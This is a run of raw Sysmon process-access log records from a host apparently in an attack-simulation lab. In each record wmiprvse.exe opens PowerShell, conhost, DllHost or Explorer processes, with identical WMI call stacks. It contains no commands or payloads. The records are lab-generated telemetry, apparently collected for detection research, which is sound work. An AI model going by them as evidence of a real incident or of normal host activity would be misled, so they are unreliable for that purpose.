16:54:03.469{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B8AA-00000000AD01}12596C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.468{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 